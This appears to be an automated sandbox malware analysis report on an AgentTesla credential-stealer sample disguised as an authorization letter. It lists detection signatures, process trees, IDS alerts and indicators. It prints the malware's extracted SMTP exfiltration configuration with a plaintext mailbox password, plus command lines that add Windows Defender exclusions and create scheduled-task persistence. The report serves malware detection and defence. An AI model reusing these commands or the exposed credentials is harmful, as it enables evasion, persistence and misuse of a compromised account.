
Windows Analysis Report
autorization Letter.exe

Overview

General Information

Sample name: autorization Letter.exe
Analysis ID: 1519119
MD5: 457f6cb01c6f3f7922ac201f70111ae5
SHA1: 934e5433fc83af812db461e3e7748c311e19b1bc
SHA256: ca471400001374bddf5e6ff03db7889cf53bd516fe64209faee8b894b454c3c5
Tags: AgentTesla, DHL, exe, user-cocaman

Detection

AgentTesla
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Scheduled temp file as task from temp location
Suricata IDS alerts for network traffic
Yara detected AgentTesla
Yara detected AntiVM3
.NET source code contains potential unpacker
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Allocates memory in foreign processes
Contains functionality to log keystrokes (.Net Source)
Hides that the sample has been downloaded from the Internet (zone.identifier)
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Uses schtasks.exe or at.exe to add and modify task schedules
Writes to foreign memory regions
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Outbound SMTP Connections
Sigma detected: Suspicious Schtasks From Env Var Folder
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • autorization Letter.exe (PID: 6180 cmdline: "C:\Users\user\Desktop\autorization Letter.exe" MD5: 457F6CB01C6F3F7922AC201F70111AE5)
    • powershell.exe (PID: 528 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\autorization Letter.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 3040 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 1020 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\tIFjYTCo.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 6048 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 6776 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • schtasks.exe (PID: 3176 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\tIFjYTCo" /XML "C:\Users\user\AppData\Local\Temp\tmpF639.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 6156 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • RegSvcs.exe (PID: 1576 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
  • tIFjYTCo.exe (PID: 3440 cmdline: C:\Users\user\AppData\Roaming\tIFjYTCo.exe MD5: 457F6CB01C6F3F7922AC201F70111AE5)
    • schtasks.exe (PID: 5960 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\tIFjYTCo" /XML "C:\Users\user\AppData\Local\Temp\tmp1162.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 1788 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • RegSvcs.exe (PID: 6540 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
  • GUIVTme.exe (PID: 5744 cmdline: "C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
    • conhost.exe (PID: 3620 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • GUIVTme.exe (PID: 5332 cmdline: "C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
    • conhost.exe (PID: 1016 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup
Name: Agent Tesla, AgentTesla
Description: A .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
Attribution: SWEED
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla
{"Exfil Mode": "SMTP", "Port": "587", "Host": "mail.unitechautomations.com", "Username": "design@unitechautomations.com", "Password": "Unitech@123"}
Source: dump.pcap, Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Author: Joe Security
Source: 0000000E.00000002.3346316308.0000000002899000.00000004.00000800.00020000.00000000.sdmp, Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Author: Joe Security
Source: 00000009.00000002.2202666103.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Author: Joe Security
Source: 00000009.00000002.2202666103.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Author: Joe Security
Source: 00000009.00000002.2204151615.000000000288A000.00000004.00000800.00020000.00000000.sdmp, Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Author: Joe Security
Source: 0000000E.00000002.3346316308.0000000002891000.00000004.00000800.00020000.00000000.sdmp, Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Author: Joe Security
Source: 1.2.autorization Letter.exe.44ec5b8.2.unpack, Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Author: Joe Security
Source: 1.2.autorization Letter.exe.44ec5b8.2.unpack, Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Author: Joe Security
Source: 1.2.autorization Letter.exe.44ec5b8.2.unpack, Rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID, Description: Detects executables referencing Windows vault credential objects. Observed in infostealers, Author: ditekSHen, Strings:
  • 0x31d64:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5
  • 0x31dd6:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55
  • 0x31e60:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F
  • 0x31ef2:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28
  • 0x31f5c:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29
  • 0x31fce:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC
  • 0x32064:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B
  • 0x320f4:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
Source: 1.2.autorization Letter.exe.44b1598.1.unpack, Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Author: Joe Security
Source: 1.2.autorization Letter.exe.44b1598.1.unpack, Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Author: Joe Security

System Summary

Source: Process started, Author: Florian Roth (Nextron Systems), Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\autorization Letter.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\autorization Letter.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\autorization Letter.exe", ParentImage: C:\Users\user\Desktop\autorization Letter.exe, ParentProcessId: 6180, ParentProcessName: autorization Letter.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\autorization Letter.exe", ProcessId: 528, ProcessName: powershell.exe
Source: Registry Key set, Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split), Data: Details: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exe, EventID: 13, EventType: SetValue, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, ProcessId: 1576, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\GUIVTme
Source: Process started, Author: Florian Roth (Nextron Systems), Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\tIFjYTCo" /XML "C:\Users\user\AppData\Local\Temp\tmp1162.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\tIFjYTCo" /XML "C:\Users\user\AppData\Local\Temp\tmp1162.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\tIFjYTCo.exe, ParentImage: C:\Users\user\AppData\Roaming\tIFjYTCo.exe, ParentProcessId: 3440, ParentProcessName: tIFjYTCo.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\tIFjYTCo" /XML "C:\Users\user\AppData\Local\Temp\tmp1162.tmp", ProcessId: 5960, ProcessName: schtasks.exe
Source: Network Connection, Author: frack113, Data: DestinationIp: 192.185.129.60, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, Initiated: true, ProcessId: 1576, Protocol: tcp, SourceIp: 192.168.2.5, SourceIsIpv6: false, SourcePort: 49711
Source: Process started, Author: Florian Roth (Nextron Systems), Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\tIFjYTCo" /XML "C:\Users\user\AppData\Local\Temp\tmpF639.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\tIFjYTCo" /XML "C:\Users\user\AppData\Local\Temp\tmpF639.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\autorization Letter.exe", ParentImage: C:\Users\user\Desktop\autorization Letter.exe, ParentProcessId: 6180, ParentProcessName: autorization Letter.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\tIFjYTCo" /XML "C:\Users\user\AppData\Local\Temp\tmpF639.tmp", ProcessId: 3176, ProcessName: schtasks.exe
Source: Process started, Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements), Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\autorization Letter.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\autorization Letter.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\autorization Letter.exe", ParentImage: C:\Users\user\Desktop\autorization Letter.exe, ParentProcessId: 6180, ParentProcessName: autorization Letter.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\autorization Letter.exe", ProcessId: 528, ProcessName: powershell.exe

Persistence and Installation Behavior

Source: Process started, Author: Joe Security, Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\tIFjYTCo" /XML "C:\Users\user\AppData\Local\Temp\tmpF639.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\tIFjYTCo" /XML "C:\Users\user\AppData\Local\Temp\tmpF639.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\autorization Letter.exe", ParentImage: C:\Users\user\Desktop\autorization Letter.exe, ParentProcessId: 6180, ParentProcessName: autorization Letter.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\tIFjYTCo" /XML "C:\Users\user\AppData\Local\Temp\tmpF639.tmp", ProcessId: 3176, ProcessName: schtasks.exe

Suricata IDS alerts (one row per alert; Severity 1 throughout):

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-09-26T07:03:00.331719+0200 | 2030171 | 1 | A Network Trojan was detected | 192.168.2.5 | 49712 | 192.185.129.60 | 587 | TCP
2024-09-26T07:03:18.387344+0200 | 2030171 | 1 | A Network Trojan was detected | 192.168.2.5 | 49711 | 192.185.129.60 | 587 | TCP
2024-09-26T07:03:14.516239+0200 | 2855542 | 1 | A Network Trojan was detected | 192.168.2.5 | 49711 | 192.185.129.60 | 587 | TCP
2024-09-26T07:03:20.151372+0200 | 2855542 | 1 | A Network Trojan was detected | 192.168.2.5 | 49712 | 192.185.129.60 | 587 | TCP
2024-09-26T07:03:14.516239+0200 | 2855245 | 1 | A Network Trojan was detected | 192.168.2.5 | 49711 | 192.185.129.60 | 587 | TCP
2024-09-26T07:03:20.151372+0200 | 2855245 | 1 | A Network Trojan was detected | 192.168.2.5 | 49712 | 192.185.129.60 | 587 | TCP
2024-09-26T07:03:00.331719+0200 | 2839723 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49712 | 192.185.129.60 | 587 | TCP
2024-09-26T07:03:18.387344+0200 | 2839723 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49711 | 192.185.129.60 | 587 | TCP
2024-09-26T07:03:00.331719+0200 | 2840032 | 1 | A Network Trojan was detected | 192.168.2.5 | 49712 | 192.185.129.60 | 587 | TCP
2024-09-26T07:03:18.387344+0200 | 2840032 | 1 | A Network Trojan was detected | 192.168.2.5 | 49711 | 192.185.129.60 | 587 | TCP

AV Detection

Source: 1.2.autorization Letter.exe.44ec5b8.2.raw.unpack, Malware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Port": "587", "Host": "mail.unitechautomations.com", "Username": "design@unitechautomations.com", "Password": "Unitech@123"}
Source: C:\Users\user\AppData\Roaming\tIFjYTCo.exe, ReversingLabs: Detection: 57%
Source: autorization Letter.exe, ReversingLabs: Detection: 57%
Source: Submitted Sample, Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Users\user\AppData\Roaming\tIFjYTCo.exe, Joe Sandbox ML: detected
Source: autorization Letter.exe, Joe Sandbox ML: detected
Source: autorization Letter.exe, Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: autorization Letter.exe, Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: PkJS.pdb source: autorization Letter.exe, tIFjYTCo.exe.1.dr
Source: Binary string: PkJS.pdbSHA256a source: autorization Letter.exe, tIFjYTCo.exe.1.dr
Source: Binary string: RegSvcs.pdb, source: GUIVTme.exe, 00000010.00000000.2249012079.0000000000902000.00000002.00000001.01000000.0000000D.sdmp, GUIVTme.exe.9.dr
Source: Binary string: RegSvcs.pdb source: GUIVTme.exe, 00000010.00000000.2249012079.0000000000902000.00000002.00000001.01000000.0000000D.sdmp, GUIVTme.exe.9.dr

Networking

Source: Network traffic, Suricata IDS: 2855245 - Severity 1 - ETPRO MALWARE Agent Tesla Exfil via SMTP : 192.168.2.5:49711 -> 192.185.129.60:587
Source: Network traffic, Suricata IDS: 2855542 - Severity 1 - ETPRO MALWARE Agent Tesla CnC Exfil Activity : 192.168.2.5:49711 -> 192.185.129.60:587
Source: Network traffic, Suricata IDS: 2855245 - Severity 1 - ETPRO MALWARE Agent Tesla Exfil via SMTP : 192.168.2.5:49712 -> 192.185.129.60:587
Source: Network traffic, Suricata IDS: 2855542 - Severity 1 - ETPRO MALWARE Agent Tesla CnC Exfil Activity : 192.168.2.5:49712 -> 192.185.129.60:587
Source: Network traffic, Suricata IDS: 2030171 - Severity 1 - ET MALWARE AgentTesla Exfil Via SMTP : 192.168.2.5:49711 -> 192.185.129.60:587
Source: Network traffic, Suricata IDS: 2839723 - Severity 1 - ETPRO MALWARE Win32/Agent Tesla SMTP Activity : 192.168.2.5:49711 -> 192.185.129.60:587
Source: Network traffic, Suricata IDS: 2840032 - Severity 1 - ETPRO MALWARE Win32/AgentTesla/OriginLogger Data Exfil via SMTP M2 : 192.168.2.5:49711 -> 192.185.129.60:587
Source: Network traffic, Suricata IDS: 2030171 - Severity 1 - ET MALWARE AgentTesla Exfil Via SMTP : 192.168.2.5:49712 -> 192.185.129.60:587
Source: Network traffic, Suricata IDS: 2839723 - Severity 1 - ETPRO MALWARE Win32/Agent Tesla SMTP Activity : 192.168.2.5:49712 -> 192.185.129.60:587
Source: Network traffic, Suricata IDS: 2840032 - Severity 1 - ETPRO MALWARE Win32/AgentTesla/OriginLogger Data Exfil via SMTP M2 : 192.168.2.5:49712 -> 192.185.129.60:587
Source: Joe Sandbox View, IP Address: 192.185.129.60
Source: Joe Sandbox View, ASN Name: UNIFIEDLAYER-AS-1US
Source: unknown, UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic, DNS traffic detected: DNS query: mail.unitechautomations.com
Source: autorization Letter.exe, tIFjYTCo.exe.1.dr, String found in binary or memory: http://crl.comodoca.com/COMODORSACertificationAuthority.crl0q
Source: autorization Letter.exe, tIFjYTCo.exe.1.dr, String found in binary or memory: http://crl.comodoca.com/COMODORSACodeSigningCA.crl0t
Source: RegSvcs.exe, 00000009.00000002.2204151615.000000000288A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000E.00000002.3346316308.0000000002899000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: http://mail.unitechautomations.com
Source: autorization Letter.exe, tIFjYTCo.exe.1.dr, String found in binary or memory: http://ocsp.comodoca.com0
Source: autorization Letter.exe, 00000001.00000002.2159567789.0000000003475000.00000004.00000800.00020000.00000000.sdmp, tIFjYTCo.exe, 0000000A.00000002.2225613849.000000000272A000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: autorization Letter.exe, 00000001.00000002.2160081111.0000000004429000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.2202666103.0000000000402000.00000040.00000400.00020000.00000000.sdmp, String found in binary or memory: https://account.dyn.com/
Source: autorization Letter.exe, tIFjYTCo.exe.1.dr, String found in binary or memory: https://www.chiark.greenend.org.uk/~sgtatham/putty/0

Key, Mouse, Clipboard, Microphone and Screen Capturing

Source: 1.2.autorization Letter.exe.44ec5b8.2.raw.unpack, cPKWk.cs, .Net Code: MPvOvSMQSR
Source: 1.2.autorization Letter.exe.44b1598.1.raw.unpack, cPKWk.cs, .Net Code: MPvOvSMQSR

System Summary

Source: 1.2.autorization Letter.exe.44ec5b8.2.unpack, type: UNPACKEDPE, Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 1.2.autorization Letter.exe.44b1598.1.unpack, type: UNPACKEDPE, Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 9.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 1.2.autorization Letter.exe.44ec5b8.2.raw.unpack, type: UNPACKEDPE, Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 1.2.autorization Letter.exe.44b1598.1.raw.unpack, type: UNPACKEDPE, Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: autorization Letter.exe, Static PE information: invalid certificate
Source: autorization Letter.exe, 00000001.00000002.2160081111.0000000004429000.00000004.00000800.00020000.00000000.sdmp, Binary or memory string: OriginalFilenamed04b9152-f33d-48a0-b781-4be8ad9dc338.exe4 vs autorization Letter.exe
Source: autorization Letter.exe, 00000001.00000000.2085689123.0000000000EE2000.00000002.00000001.01000000.00000003.sdmp, Binary or memory string: OriginalFilenamePkJS.exe0 vs autorization Letter.exe
Source: autorization Letter.exe, 00000001.00000002.2159567789.0000000003475000.00000004.00000800.00020000.00000000.sdmp, Binary or memory string: OriginalFilenamed04b9152-f33d-48a0-b781-4be8ad9dc338.exe4 vs autorization Letter.exe
Source: autorization Letter.exe, 00000001.00000002.2160081111.0000000004693000.00000004.00000800.00020000.00000000.sdmp, Binary or memory string: OriginalFilenameTyrone.dll8 vs autorization Letter.exe
Source: autorization Letter.exe, 00000001.00000002.2157399976.00000000016CE000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: OriginalFilenameclr.dllT vs autorization Letter.exe
Source: autorization Letter.exe, 00000001.00000002.2163332817.0000000007860000.00000004.08000000.00040000.00000000.sdmp, Binary or memory string: OriginalFilenameTyrone.dll8 vs autorization Letter.exe
Source: autorization Letter.exe, Binary or memory string: OriginalFilenamePkJS.exe0 vs autorization Letter.exe
Source: autorization Letter.exe, Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: 1.2.autorization Letter.exe.44ec5b8.2.unpack, type: UNPACKEDPE, Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 1.2.autorization Letter.exe.44b1598.1.unpack, type: UNPACKEDPE, Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 9.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 1.2.autorization Letter.exe.44ec5b8.2.raw.unpack, type: UNPACKEDPE, Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 1.2.autorization Letter.exe.44b1598.1.raw.unpack, type: UNPACKEDPE, Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: autorization Letter.exe, Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: tIFjYTCo.exe.1.dr, Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: 1.2.autorization Letter.exe.44ec5b8.2.raw.unpack, cPs8D.cs, Cryptographic APIs: 'TransformFinalBlock'
Source: 1.2.autorization Letter.exe.44ec5b8.2.raw.unpack, 72CF8egH.cs, Cryptographic APIs: 'TransformFinalBlock'
Source: 1.2.autorization Letter.exe.44ec5b8.2.raw.unpack, G5CXsdn.cs, Cryptographic APIs: 'TransformFinalBlock'
Source: 1.2.autorization Letter.exe.44ec5b8.2.raw.unpack, 3uPsILA6U.cs, Cryptographic APIs: 'CreateDecryptor'
Source: 1.2.autorization Letter.exe.44ec5b8.2.raw.unpack, 6oQOw74dfIt.cs, Cryptographic APIs: 'TransformFinalBlock'
Source: 1.2.autorization Letter.exe.44ec5b8.2.raw.unpack, aMIWm.cs, Cryptographic APIs: 'CreateDecryptor', 'TransformBlock'
Source: 1.2.autorization Letter.exe.44ec5b8.2.raw.unpack, 3QjbQ514BDx.cs, Cryptographic APIs: 'TransformFinalBlock'
Source: 1.2.autorization Letter.exe.46b0be0.3.raw.unpack, lSFA8pMlGZmCox3ZBB.cs, Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 1.2.autorization Letter.exe.7860000.5.raw.unpack, poU46SQrMKhRY6KoAP.cs, Security API names: _0020.SetAccessControl
Source: 1.2.autorization Letter.exe.7860000.5.raw.unpack, poU46SQrMKhRY6KoAP.cs, Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: 1.2.autorization Letter.exe.7860000.5.raw.unpack, poU46SQrMKhRY6KoAP.csSecurity API names: _0020.AddAccessRule
                      Source: 1.2.autorization Letter.exe.7860000.5.raw.unpack, lSFA8pMlGZmCox3ZBB.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: 1.2.autorization Letter.exe.46b0be0.3.raw.unpack, poU46SQrMKhRY6KoAP.csSecurity API names: _0020.SetAccessControl
                      Source: 1.2.autorization Letter.exe.46b0be0.3.raw.unpack, poU46SQrMKhRY6KoAP.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: 1.2.autorization Letter.exe.46b0be0.3.raw.unpack, poU46SQrMKhRY6KoAP.csSecurity API names: _0020.AddAccessRule
                      Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@23/19@1/1
                      Source: C:\Users\user\Desktop\autorization Letter.exe | File created: C:\Users\user\AppData\Roaming\tIFjYTCo.exe
                      Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exe | Mutant created: NULL
                      Source: C:\Users\user\AppData\Roaming\tIFjYTCo.exe | Mutant created: \Sessions\1\BaseNamedObjects\hxHNKsIkb
                      Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3040:120:WilError_03
                      Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6048:120:WilError_03
                      Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1016:120:WilError_03
                      Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3620:120:WilError_03
                      Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6156:120:WilError_03
                      Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1788:120:WilError_03
                      Source: C:\Users\user\Desktop\autorization Letter.exe | File created: C:\Users\user\AppData\Local\Temp\tmpF639.tmp
                      Source: autorization Letter.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: autorization Letter.exe | Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\autorization Letter.exe | File read: C:\Users\user\Desktop\desktop.ini
                      Source: C:\Users\user\Desktop\autorization Letter.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                      Source: tIFjYTCo.exe.1.dr | Binary or memory string: INSERT INTO Product(Id, Name, Units, Price, CategoryId)VALUES (@id, @name, @units, @price, @idcat); SELECT last_insert_rowid()
